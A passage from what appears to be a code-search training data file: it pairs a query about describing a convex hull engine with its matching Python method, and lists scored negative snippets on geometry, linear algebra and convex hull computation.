difs[row_id, :, 0] = ident @ xs[:, 0]\n difs[row_id, :, 1] = ident @ xs[:, 1]\n return difs", "def discreteComplexComposeGraph(self,S,n):\n N=len(S)\n M=N//2\n g=[]\n d=0\n for k in range(M):\n d+=S[k+M]*cmath.exp(2j*cmath.pi*k*n/N)+S[-k+M]*cmath.exp(-2j*cmath.pi*k*n/N)\n g.append((d.real,d.imag))\n return g", "def scale(self,n,d=1):\r\n\t\t\r\n\t\t# scale all terms\r\n\t\ts = [i.scale(n,d) for i in self]\r\n\t\t\r\n\t\treturn Li(s)", "def r_vars(size, used=None):\n return r_symbols(size, VAR_SYMBOLS, ARGS.variable_length, used)", "def syndSolveLazy(wdsize): # PENDING to debug\r\n # NameMat = wd2N[wdsize]\r\n r = int(math.ceil(math.log(wdsize, 2)) ) + 2 \r\n \r\n P = k2pmap[wdsize] # get the full parity matrix <kxr> \r\n assert P.shape[0]==wdsize and P.shape[1]==r \r\n finals = '' \r\n s1='assign noerr = '\r\n for i in xrange(r):\r\n ss = '~synd[{0}] & '.format(i) if i !=r-1 else '~synd[{0}];'.format(i) \r\n s1 += ss \r\n\r\n s1 += '\\n' \r\n\r\n finals += s1 \r\n\r\n # neg = lambda x: '~' if x==0 else '' \r\n\r\n s2 = ''\r\n\r\n for idx, name in enumerate(P):\r\n flip_s = 'assign flip[{0}] = '.format(idx)\r\n setbit_ind_array = np.nonzero(name)[0].astype('int') \r\n for i in setbit_ind_array: # set bit index\r\n subs = 'synd[{index}] & '.format(index = i) if i != setbit_ind_array[-1] else \\\r\n 'synd[{index}];'.format( index=i) \r\n flip_s += subs \r\n s2 = s2 + flip_s + '\\n' \r\n\r\n\r\n finals += s2 \r\n\r\n return finals", "def diag_dom(n, num_entries=None):\n if num_entries is None:\n num_entries = int(n**1.5) - n\n A = np.zeros((n,n))\n rows = np.random.choice(np.arange(0,n), size=num_entries)\n cols = np.random.choice(np.arange(0,n), size=num_entries)\n data = np.random.randint(-4, 4, size=num_entries)\n for i in xrange(num_entries):\n A[rows[i], cols[i]] = data[i]\n for i in xrange(n):\n A[i,i] = np.sum(np.abs(A[i])) + 1\n return A", "def expand_dofs(dofs, n_components):\n if dofs.ndim > 1:\n sh = dofs.shape\n dofs = dofs.ravel()\n\n else:\n sh = None\n\n edofs = nm.empty(n_components * dofs.shape[0], nm.int32)\n for idof in range(n_components):\n aux = n_components * dofs + idof\n edofs[idof::n_components] = aux\n\n if sh is not None:\n edofs.shape = sh[:-1] + (-1,)\n\n return edofs", "def symbolize(X, m):\n \n X = np.array(X)\n\n if m >= len(X):\n raise ValueError(\"Length of the series must be greater than m\")\n \n dummy = []\n for i in range(m):\n l = np.roll(X,-i)\n dummy.append(l[:-(m-1)])\n \n dummy = np.array(dummy)\n \n symX = []\n \n for mset in dummy.T:\n rank = stats.rankdata(mset, method=\"min\")\n symbol = np.array2string(rank, separator=\"\")\n symbol = symbol[1:-1]\n symX.append(symbol)\n \n return symX", "def get_X_lasso(n, m):\n\n jHa = np.arange(m * n)\n iHa = np.repeat(np.arange(n), m)\n jHb = np.arange(m * n)\n iHb = np.tile(np.arange(m), n) + n\n j = np.concatenate((jHa, jHb))\n i = np.concatenate((iHa, iHb))\n H = sp.csc_matrix((np.ones(n * m * 2), (i, j)), shape=(n+m, n*m))\n return H", "def MM(x,N,n,l,t=0):\n Mat = np.zeros([2**l,2**l])\n for iii in range(N):\n Mat[iii,(x**n * iii)%N] = 1\n return Mat" ]
[ "0.59795463", "0.5888374", "0.57391495", "0.5711324", "0.5686454", "0.5563071", "0.5492323", "0.5435326", "0.5423058", "0.5419523", "0.54059994", "0.5392236", "0.538575", "0.5366352", "0.5356909", "0.53455615", "0.5337914", "0.5334625", "0.5330213", "0.53227186", "0.53154725", "0.53090394", "0.5283747", "0.5281429", "0.526937", "0.52573615", "0.5251509", "0.52102005", "0.5202278", "0.51470196", "0.5135316", "0.5134825", "0.5132082", "0.5124863", "0.5110964", "0.51070005", "0.51016617", "0.5088285", "0.5072215", "0.5069307", "0.50554955", "0.5036671", "0.5034988", "0.5034725", "0.5011805", "0.5010148", "0.5008242", "0.5007005", "0.49876186", "0.49870697", "0.4985024", "0.49813014", "0.49687636", "0.49648944", "0.49542427", "0.4951821", "0.49510753", "0.4947966", "0.4934529", "0.4932151", "0.49213573", "0.49023703", "0.489465", "0.4887559", "0.48869953", "0.48765406", "0.487493", "0.48700628", "0.48667222", "0.48587996", "0.4850112", "0.48480186", "0.48474178", "0.48402905", "0.48402905", "0.48402905", "0.48332343", "0.48322088", "0.48312396", "0.4821526", "0.4819062", "0.48096684", "0.4808425", "0.4808425", "0.4808123", "0.48002785", "0.47954276", "0.47933435", "0.47853315", "0.47746092", "0.47739026", "0.4773852", "0.47694048", "0.47665554", "0.4763099", "0.47616357", "0.47612846", "0.4755161", "0.47484088", "0.47371075" ]
0.58973736
1
r""" Return a string that describes the convex hull engine.
def convex_hull_engine(self): return self.convex_hull._name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _repr_(self):\n desc = ''\n if self.n_vertices()==0:\n desc += 'The empty polyhedron'\n else:\n desc += 'A ' + repr(self.dim()) + '-dimensional polyhedron'\n desc += ' in '\n if self.field()==QQ: desc += 'QQ'\n else: desc += 'RDF'\n desc += '^' + repr(self.ambient_dim()) \n\n if self.n_vertices()>0:\n desc += ' defined as the convex hull of ' \n desc += repr(self.n_vertices())\n if self.n_vertices()==1: desc += ' vertex'\n else: desc += ' vertices'\n \n if self.n_rays()>0:\n if self.n_lines()>0: desc += \", \"\n else: desc += \" and \"\n desc += repr(self.n_rays())\n if self.n_rays()==1: desc += ' ray'\n else: desc += ' rays'\n \n if self.n_lines()>0:\n if self.n_rays()>0: desc += \", \"\n else: desc += \" and \"\n desc += repr(self.n_lines())\n if self.n_lines()==1: desc +=' line'\n else: desc +=' lines'\n\n return desc + \".\\n\";", "def convex_hull(self):\n return self._geomgen(capi.geom_convex_hull)", "def convex_hull(self):\n return _property_geo(arctern.ST_ConvexHull, self)", "def _repr_(self):\n return \"Projective hypersurface defined by %s in %s\"%(\n self.defining_polynomial(), self.ambient_space())", "def _repr_(self):\n return \"Affine hypersurface defined by %s in %s\"%(\n self.defining_polynomial(), self.ambient_space())", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n cont = 1\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n print(\"antes \"), print(cont), print(lower)\n lower.pop()\n print(\"despues \"),print(lower)\n cont += 1\n lower.append(p)\n xlower ,ylower = getlists(lower)\n plt.plot(xlower,ylower,color=\"yellow\")\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n print(upper)\n print(\"hello2 \")\n print(cross((2,0),(2,4),(2.5,3)))\n\n xupper ,yupper = getlists(upper)\n plt.plot(xupper,yupper,color=\"blue\")\n\n\n return lower[:-1] + upper[:-1]", "def _repr_(self):\n s = 'The projection of a polyhedron into ' + repr(self.dimension) \n s += ' dimensions.'\n return s + \"\\n\"", "def hull(self):\n capacity = self._getAttribute(Attribute.hullCapacity)\n em = self._getAttribute(Attribute.hullEM)\n explosive = self._getAttribute(Attribute.hullExplosive)\n kinetic = self._getAttribute(Attribute.hullKinetic)\n thermal = self._getAttribute(Attribute.hullThermal)\n\n em = 1.0 - em\n explosive = 1.0 - explosive\n kinetic = 1.0 - kinetic\n thermal = 1.0 - thermal\n\n return {\n \"capacity\": capacity,\n \"resists\": {\n \"em\": em,\n \"explosive\": explosive,\n \"kinetic\": kinetic,\n \"thermal\": thermal\n }\n }", "def convex_hull(self):\n nodes = self._datacontroller.get_data('nodes')\n scale = self._datacontroller.get_data('scale')\n hull = tsputil.convex_hull_helper(nodes)\n if hull:\n result = construct_step(hull, 'Most Top Left Node', 'Clockwise', nodes, scale)\n 
self._datacontroller.commit_change('path', result)", "def getContourRep(self):\n\t\tvertex1 = [[self.startX, self.startY]]\n\t\tvertex2 = [[self.startX, self.endY]]\n\t\tvertex3 = [[self.endX, self.startY]]\n\t\tvertex4 = [[self.endX, self.endY]]\n\t\tvertices = [vertex1, vertex2, vertex3, vertex4]\n\t\treturn convexHull(np.asarray(vertices, dtype = np.int32))", "def __str__(self):\n vertices = []\n for idx in range(3):\n v = self.vertices[idx]\n if v is not None:\n vertices.append(str(v))\n else:\n orig_idx, dest_idx = (idx - 1) % 3, (idx + 1) % 3\n orig, dest = self.vertices[orig_idx], self.vertices[dest_idx]\n halfway = (orig.x + dest.x) * .5, (orig.y + dest.y) * .5\n# print(halfway)\n d = orig.distance(dest)\n dx = dest.x - orig.x\n# print(d)\n# print(dx)\n dx /= d\n dy = dest.y - orig.y\n# print(dy)\n dy /= d\n dx *= d\n dy *= d\n pt_halfway = halfway[0] + dy, halfway[1] - dx\n# print(\"outside\", orig_idx, dest_idx, pt_halfway)\n vertices.append(\"{0[0]} {0[1]}\".format(pt_halfway))\n vertices.append(vertices[0])\n return \"POLYGON(({0}))\".format(\", \".join(vertices))", "def _repr_(self):\n desc = ''\n if self.n_vertices()==0:\n desc += 'The empty lattice polytope'\n else:\n desc += 'A ' + repr(self.affine_dimension()) + '-dimensional lattice polytope'\n desc += ' in ZZ^' + repr(self.space_dimension())\n\n if self.n_vertices()>0:\n desc += ' with '\n desc += repr(self.n_vertices())\n if self.n_vertices()==1: desc += ' vertex'\n else: desc += ' vertices'\n return desc", "def give_convex_hull(rand_points):\n return ConvexHull(rand_points)", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull \n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list. 
\n return lower[:-1] + upper[:-1]", "def convex_hull(self):\n if self._faces is None:\n if self._vertices is None:\n return None\n self.triangulate()\n return self._convex_hull", "def display_and_label_hulls(self, hulls, src):\n \n labels = []\n\n for hull in hulls:\n\n angle = 0\n MA = 1\n ma = 1\n try:\n _,(MA,ma),angle = cv.fitEllipse(hull)\n except:\n pass\n cosAngle = np.abs(np.cos(angle*np.pi/180))\n\n # Only human-classify hulls if it is reasonably a vertically oriented rectangle\n # This is a hueristic to not have to waste time clasifying hulls clearly not poles\n if (cosAngle < 1.75) and (cosAngle > 0.85) and (MA/ma < 0.28):\n cpy = src.copy()\n hull_img = cv.polylines(cpy, [hull], True, (0,0,255), 3)\n cv.imshow(\"Hull\", hull_img)\n keycode = cv.waitKey(0)\n if keycode == 49:\n labels.append((hull, 0))\n print(\"Not a Pole\")\n elif keycode == 50:\n labels.append((hull, 1))\n print(\"A Pole!\")\n else:\n raise Exception(\"Unexpected Key Pressed\")\n else:\n labels.append((hull, 0))\n cv.destroyAllWindows()\n return labels", "def __str__(self):\n if self.getType() == FRAGMENT:\n t = \"FRAGMENT\"\n else:\n t = \"VERTEX\"\n if not self.isCompiled():\n s = \"not compiled\"\n else:\n s = \"compiled\"\n return \"file: {0}\\ntype: {1}\\nstatus: {2}\\n\".format(self.getPath(), t, s)", "def __str__(self):\n return \"hl(\" + str(self.point) + \",\" + str(self.angle) + \")\"", "def convex_hull(points):\n pointList = ExtendedTupleList(points)\n complete_ranges = pointList.range_within(0, 1)\n # Filters for four quadrants\n filters = [\n ((0, complete_ranges[1][\"max\"][2], \">=\"), (1, complete_ranges[0][\"max\"][2], \">=\")), #Q1\n ((0, complete_ranges[1][\"max\"][1], \"<=\"), (1, complete_ranges[0][\"min\"][2], \">=\")), #Q2\n ((0, complete_ranges[1][\"min\"][1], \"<=\"), (1, complete_ranges[0][\"min\"][1], \"<=\")), #Q3\n ((0, complete_ranges[1][\"min\"][2], \">=\"), (1, complete_ranges[0][\"max\"][1], \"<=\")) #Q4\n ]\n # Sorting reversals (True means Desc sort, False means Asc sort. 
Y sort given first)\n sorts = [\n (True, True),\n (True, False),\n (False, False),\n (False, True),\n ]\n hull = ExtendedTupleList([])\n # In CW order of quadrants...\n for index in [0, 3, 2, 1]:\n # Find all the relevant points\n quad_points = ExtendedTupleList([point for point in pointList.filter(filters[index])])\n # Sort them properly\n quad_points.double_sort(1, 0, reverse_outside=sorts[index][0], reverse_inside=sorts[index][1])\n # Build a convex line segment\n line_segment = convex_line_segment(quad_points, sorts[index][0], sorts[index][1])\n # Reverse it, if we need to\n if index % 2 == 1:\n line_segment.reverse()\n # Add all the points in, avoiding repeated points.\n hull.extend(line_segment, avoid_repeats=True)\n return hull", "def convex_hull(l):\n\tpass", "def show_convex_hull(points, input_choice, timing,percent_pts,size,hull_points = None):\n\texists = os.path.isdir('plots')\n\tif not exists: \n\t\tos.mkdir('plots')\n\n\n\tfor each in points:\n\t\tplt.plot(each[0],each[1],'o-')\n\n\tif hull_points is not None:\n\t\thull_pt_list = []\n\t\tfor each in hull_points:\n\t\t\thull_pt_list.append(list(each))\n\n\t\thull_pt_arr = np.asarray(hull_pt_list)\n\t\t# print(hull_pt_arr)\n\t\tplt.plot(hull_pt_arr[:,0],hull_pt_arr[:,1],'k-')\n\t\tfirst_coord = hull_pt_arr[0,:].reshape(1,2)\n\t\tlast_coord = hull_pt_arr[len(hull_pt_arr)-1,:].reshape(1,2)\n\n\t\tlast_coord_arr = np.append(first_coord, last_coord, axis = 0)\n\t\tplt.plot(last_coord_arr[:,0],last_coord_arr[:,1],'k-')\n\t\tplt.title(label = 'For input : '+input_choice+percent_pts+' time taken = '+str(timing)+' s\\n'+'N='+str(size))\n\t\n\tplt.savefig('plots/'+'Graham_Scan_'+str(input_choice)+str(percent_pts)+'_N='+str(size)+'.png')\n\tplt.show()", "def to_str(self):\n return u\"Superellipse[{:.4g},{:.4g}]\".format(self.alpha0.l, self.alpha0.r)", "def convex_hull(*args):\n from point import Point\n from line import Segment\n from polygon import Polygon\n\n def uniquify(a):\n # not order preserving\n return list(set(a))\n\n p = args[0]\n if isinstance(p, Point):\n p = uniquify(args)\n\n if len(p) == 1:\n return p[0]\n elif len(p) == 2:\n return Segment(p[0], p[1])\n\n def orientation(p, q, r):\n '''Return positive if p-q-r are clockwise, neg if ccw, zero if\n collinear.'''\n return (q[1] - p[1])*(r[0] - p[0]) - (q[0] - p[0])*(r[1] - p[1])\n\n # scan to find upper and lower convex hulls of a set of 2d points.\n U = []\n L = []\n p.sort()\n for p_i in p:\n while len(U) > 1 and orientation(U[-2], U[-1], p_i) <= 0:\n U.pop()\n while len(L) > 1 and orientation(L[-2], L[-1], p_i) >= 0:\n L.pop()\n U.append(p_i)\n L.append(p_i)\n U.reverse()\n convexHull = tuple(L + U[1:-1])\n\n if len(convexHull) == 2:\n return Segment(convexHull[0], convexHull[1])\n return Polygon(convexHull)", "def visualHull(sils, length):\n result = sils.pop(0).cone(length)\n assert result.pnFacesInPoly()\n i = 0\n for s in sils:\n # print(i)\n assert result.pnFacesInPoly()\n result = result.intersection(s.cone(length), True)\n # result.plot()\n i += 1\n return result", "def make_convex_hull(self):\n hull_points_d = []\n try:\n print \"self.V_bar_list_d******************\", self.V_bar_list_d\n hull = ConvexHull(self.V_bar_list_d)\n hull_vertices = hull.vertices\n\n for i in hull_vertices:\n hull_points_d.append(self.V_bar_list_d[i])\n\n except scipy.spatial.qhull.QhullError:\n hull_points_d = self.V_bar_list_d\n\n return hull_points_d", "def formatted_str(self):\n # Verify correct vertex values\n self.verify_vertex_values()\n # Generate output string\n output_string = 
\"\"\n for line in range(9):\n for row in range(9):\n if self.grid[line][row] is None:\n output_string += \".\"\n else:\n output_string += str(self.grid[line][row])\n if row != 8:\n output_string += \" \"\n elif line != 8:\n output_string += \"\\n\"\n if row in [2, 5]:\n output_string += \"| \"\n if line in [2, 5]:\n output_string += \"------+-------+------\\n\"\n return output_string", "def _convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list.\n return lower[:-1] + upper[:-1]", "def __str__(self):\n puzzle_string = '—' * 13 + '\\n'\n for i in range(self.PUZZLE_NUM_ROWS):\n for j in range(self.PUZZLE_NUM_COLUMNS):\n puzzle_string += '│{0: >2}'.format(str(self.position[i][j]))\n if j == self.PUZZLE_NUM_COLUMNS - 1:\n puzzle_string += '│\\n'\n\n puzzle_string += '—' * 13 + '\\n'\n return puzzle_string", "def draw(self):\n drawing = \"\"\n \n if self.get_gene().get_choice_at(1) is 'c':\n drawing += 'o'\n else:\n drawing += 'x'\n \n if self.is_tft():\n drawing += \"tft\"\n return drawing\n elif self.is_t2t():\n drawing += \"t2t\"\n return drawing\n elif self.is_ftf():\n drawing += \"ftf\"\n return drawing\n\n rule = self.get_gene().get_defect_fraction()\n fraction_display = 0.166\n\n if rule >= 1.0:\n drawing += \"ddd\"\n elif rule > (5*fraction_display):\n drawing += \"ddc\"\n elif rule > (4*fraction_display):\n drawing += \"dcd\"\n elif rule > (3*fraction_display):\n drawing += \"dcc\"\n elif rule > (2*fraction_display):\n drawing += \"cdd\"\n elif rule > (1*fraction_display):\n drawing += \"cdc\"\n elif rule > (0*fraction_display):\n drawing += \"ccd\"\n else:\n drawing += \"ccc\"\n\n return drawing", "def construct_convex_hull(vertices: Sequence[Point]) -> Polyhedron:\n coords = np.zeros((len(vertices),3))\n for i,vertex in enumerate(vertices):\n coords[i,:] = vertex.coordinates\n hull = qconvex(\"i\", coords)\n n_facets = int(hull[0])\n facets = []\n for facet_vertices_str in hull[1:]:\n facet_vertices_idx = [int(x) for x in facet_vertices_str.split(' ')]\n facet_vertices = [vertices[i] for i in facet_vertices_idx]\n facet = Facet([Contour.from_vertices(facet_vertices)])\n facets.append(facet)\n polyhedron = Polyhedron(facets)\n return polyhedron", "def __str__(self):\n output = 'Pathogens:\\n'\n for x in self.extant_p:\n output += ' n %s h %f d %f host %s extant\\n' % (x.name, x.height, x.dist, x.host.name)\n for x in self.not_extant_p:\n output += ' n %s h %f d %f host %s not extant\\n' % (x.name, x.height, x.dist, 
x.host.name)\n for x in self.not_yet_sampled_p:\n output += ' n %s h %f d %f host %s not yet sampled\\n' % (x.name, x.height, x.dist, x.host.name)\n\n output += 'Hosts:\\n'\n for x in self.extant_h:\n output += ' %s %f %f extant\\n' % (x.name, x.height, x.dist)\n for x in self.not_extant_h:\n output += ' %s %f %f not extant\\n' % (x.name, x.height, x.dist)\n for x in self.not_yet_sampled_h:\n output += ' %s %f %f not yet sampled\\n' % (x.name, x.height, x.dist)\n\n return output", "def __str__(self) -> str:\n if self.decorator is None:\n decorator_str = \"\"\n elif self.decorator:\n decorator_str = \"+\"\n else:\n decorator_str = \"-\"\n return \" \".join([\"The nilpotent orbit corresponding\",\n f\"to partition {self.my_diagram}{decorator_str}\",\n f\"in type {self.my_type.letter()} {self.lie_rank}\"])", "def __repr__(self):\n return 'Polygon({%s})' % \", \".join(str(line) for line in self.lines)", "def __str__(self):\n s = \"\"\n for i in range(13,25):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n s += '\\n'\n for i in range(12, 0,-1):\n if (self.p1vec[i] > 0):\n s += \"|W{0:02}|\".format(self.p1vec[i])\n elif (self.p2vec[25 - i] > 0):\n s += \"|B{0:02}|\".format(self.p2vec[25 - i])\n else:\n s += \"| |\"\n return s", "def __str__(self) -> str:\n if self.scalar_vector:\n return f\"({self.w:-.4f} {self.x:+.4f}i {self.y:+.4f}j {self.z:+.4f}k)\"\n return f\"({self.x:-.4f}i {self.y:+.4f}j {self.z:+.4f}k {self.w:+.4f})\"", "def convex_hull(self):\n if isinstance(self.crs, GeographicalCRS):\n raise CRSError(\"not implemented for geographical coordinate \"\n \"systems. Project to a projected coordinate system.\")\n\n points = [pt for pt in self]\n\n # Find the lowermost (left?) point\n pt0 = points[0]\n idx = 0\n for i, pt in enumerate(points[1:]):\n if (pt.y < pt0.y) or ((pt.y == pt0.y) and (pt.x < pt0.x)):\n pt0 = pt\n idx = i+1\n points.pop(idx)\n\n # Sort CCW relative to pt0, and drop all but farthest of any duplicates\n points.sort(key=lambda pt: pt0.distance(pt))\n points.sort(key=lambda pt: _cvectorgeo.polarangle(pt0.vertex, pt.vertex))\n alpha = -1\n drop = []\n for i,pt in enumerate(points):\n a = _cvectorgeo.polarangle(pt0.vertex, pt.vertex)\n if a == alpha:\n drop.append(i)\n else:\n alpha = a\n\n if len(drop) != 0:\n for i in drop[::-1]:\n points.pop(i)\n\n # initialize convex hull\n if len(points) == 2:\n return Polygon([pt0, points[0], points[1]])\n elif len(points) == 1:\n raise GeometryError(\"convex polygon not defined for two points\")\n else:\n\n S = [pt0, points[0], points[1]]\n for pt in points[2:]:\n while not _cvectorgeo.isleft(S[-2].vertex, S[-1].vertex, pt.vertex):\n S.pop()\n S.append(pt)\n\n return Polygon(S, crs=self.crs)", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross\n # product. 
Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n return lower, upper", "def name(self):\n return \"cnotdihedral\"", "def solution_to_string(self):\n solution_vector_index_format = [index+1 if elem == 1 else -index-1 for index, elem in enumerate(self.solution_vector)]\n return \" \".join(map(str, solution_vector_index_format))", "def __repr__(self) -> str:\n return_string = str()\n\n return_string += f\"Representation of dataset with {len(self.internal_types)} elements:\\n\"\n return_string += f\"List of categories:\\t{self.internal_types}\\n\"\n return_string += f\"First and last 5 features:\\n\"\n for i in range(5):\n return_string += f\"\\t{self.internal_data[i]}\\n\"\n return_string += f\"\\t...\\n\"\n for i in range(4, -1, -1):\n return_string += f\"\\t{self.internal_data[i]}\\n\"\n return_string += \"For more information, use debugger.\"\n\n return return_string", "def hull_convex(ob, me, selected_only, precision = 0.1):\n # find convex hull\n vertices, triangles = pyffi.utils.quickhull.qhull3d(\n [tuple(v.co) for v in me.verts if v.sel or not selected_only],\n precision = precision)\n # create convex mesh\n box = Blender.Mesh.New('convexpoly')\n for vert in vertices:\n box.verts.extend(*vert)\n for triangle in triangles:\n box.faces.extend(triangle)\n # link mesh to scene and set transform\n scn = Blender.Scene.GetCurrent()\n boxob = scn.objects.new(box, 'convexpoly')\n boxob.setMatrix(ob.getMatrix('worldspace'))\n # set bounds type\n boxob.drawType = Blender.Object.DrawTypes['BOUNDBOX']\n boxob.rbShapeBoundType = 5 # convex hull shape not in blender Python API; Blender.Object.RBShapes['CONVEXHULL']?\n boxob.drawMode = Blender.Object.DrawModes['WIRE']", "def __str__(self):\n inside_list = lambda _v, _h, a: any(x == _h and y == _v for y, x in a)\n resultant = ''\n for _v in range(1, self.size_v + 1):\n for _h in range(1, self.size_h + 1):\n if self.current_location[1] == _h and self.current_location[0] == _v:\n resultant = resultant + '@'\n elif inside_list(_v, _h, self.boxes):\n resultant = resultant + '$'\n elif inside_list(_v, _h, self.storage_locations):\n resultant = resultant + '.'\n elif inside_list(_v, _h, self.wall_squares):\n resultant = resultant + '#'\n else:\n resultant = resultant + ' '\n resultant = resultant + '\\n'\n\n return resultant", "def __repr__(self):\n\t\tret = \"\"\n\t\tfor i, x in enumerate(self.squares):\n\n\t\t\tret += \"\\t\"\n\t\t\tfor j in range(32): ret += u\"\\u2015\"\n\t\t\tret += \"\\n\\t|\"\n\t\t\tfor y in x:\n\t\t\t\tret += str(y)\n\t\t\t\tret += \" | \"\n\n\t\t\tret += str(i+1) + \"\\n\"\n\n\t\tret += \"\\t\"\n\t\tfor i in range(32): ret += u\"\\u2015\"\n\t\tret += \"\\n \"\n\n\t\tfor l in self.letters:\n\t\t\tret += l+\" \"\n\t\treturn ret", "def __repr__(self) -> str:\n context = \" \".join(\"{}={}\".format(k, v) for k, v in self._solution.items())\n return \"<Twilio.Supersim.V1.FleetContext {}>\".format(context)", "def convex_hull(points):\n points = np.array(points)\n hull = ConvexHull(points)\n return points[hull.vertices, :]", "def __str__(self):\n if 
self.fshader is None:\n f = \"not defined\"\n else:\n f = self.fshader.getPath()\n if self.vshader is None:\n v = \"not defined\"\n else:\n v = self.vshader.getPath()\n if self.enabled:\n e = \"enabled\"\n else:\n e = \"disabled\"\n if self.isCompiled():\n c = \"compiled | {0}\".format(e)\n else:\n c = \"not compiled | {0}\".format(e)\n return \"shader: {3}\\nfragment shader: {0}\\nvertex shader: {1}\\nstatus: {2}\".format(f, v, c, self.getName())", "def find_convex_hull(ctx: Context):\n if ctx.contours is None or len(ctx.contours) == 0:\n return 0\n\n max_defects = 0\n defects = None\n contour = None\n for c in ctx.contours:\n ctx.hull = cv2.convexHull(c, False, False, False)\n if ctx.hull is not None:\n d = cv2.convexityDefects(c, ctx.hull, None)\n if d is not None:\n if len(d) <= max_defects:\n continue\n ctx.num_defects = len(d)\n max_defects = ctx.num_defects\n defects = d\n contour = c\n\n if defects is None:\n return\n\n # calculate hand center via mean of defect depth points\n x = 0\n y = 0\n for d in defects:\n depth_point = contour[d[0][2]]\n x += depth_point[0][0]\n y += depth_point[0][1]\n\n x = int(x / len(defects))\n y = int(y / len(defects))\n ctx.hand_center = (x, y)\n\n # calculate hand radius as mean of distances\n dist = 0\n for d in defects:\n depth_point = contour[d[0][2]]\n dx, dy = depth_point[0][0], depth_point[0][1]\n dist += math.sqrt(math.pow(x - dx, 2) * math.pow(y - dy, 2))\n ctx.hand_radius = int(dist / len(defects))", "def main():\n print(\"\\nHello world from hull.py\\n\")\n\n all_hulls = Hull.get_hulls()\n for key in all_hulls.keys():\n print(all_hulls[key], \"\\n\")\n time.sleep(0.01)\n print(\"\\n^ These are all the hulls I can make.\")\n print(\"Total number of hulls = %i\" % (len(all_hulls)))", "def extract_hull_from_shapefile ( logger, shape_file ) :\n try :\n logger.info ( \"Extract hull from shapefile \" + str(shape_file) ) \n fIn = ogr.Open ( str(shape_file) )\n layer = fIn.GetLayer(0)\n feature = layer.GetNextFeature() \n geom = feature.GetGeometryRef()\n hull_wkt = str(geom.ExportToWkt())\n return hull_wkt\n except Exception, err:\n logger.critical(\"Extract hull from shapefile failed: ERROR: %s\\n\" % str(err))\n raise", "def __CalculateConvexHull(self, contour):\r\n return cv2.convexHull(contour)", "def _repr_(self):\n return (\"%d-d CPR-Fano toric variety covered by %d affine patches\"\n % (self.dimension_relative(), self.fan().ngenerating_cones()))", "def test_convexHullFacetArea(self):\n try:\n import pyhull\n except ImportError:\n self.skipTest(\"Pyhull (optional) is not available so cannot compute facet area.\")\n \n # make points\n N = 8\n pts = [0, 0, 0,\n 3, 0, 0,\n 0, 3, 0,\n 0, 0, 3,\n 3, 3, 0,\n 0, 3, 3,\n 3, 0, 3,\n 3, 3, 3]\n \n # calc volume\n volume, facetArea = clusters.findConvexHullVolume(N, pts)\n \n self.assertAlmostEqual(facetArea, 54.0)", "def Problem11():\n return 'Ductile Coulomb-Mohr'", "def _repr_(self):\n return \"Hyperbolic plane\"", "def ellipseDesc(lps):\r\n unit = 100 #units in QualiTree are in 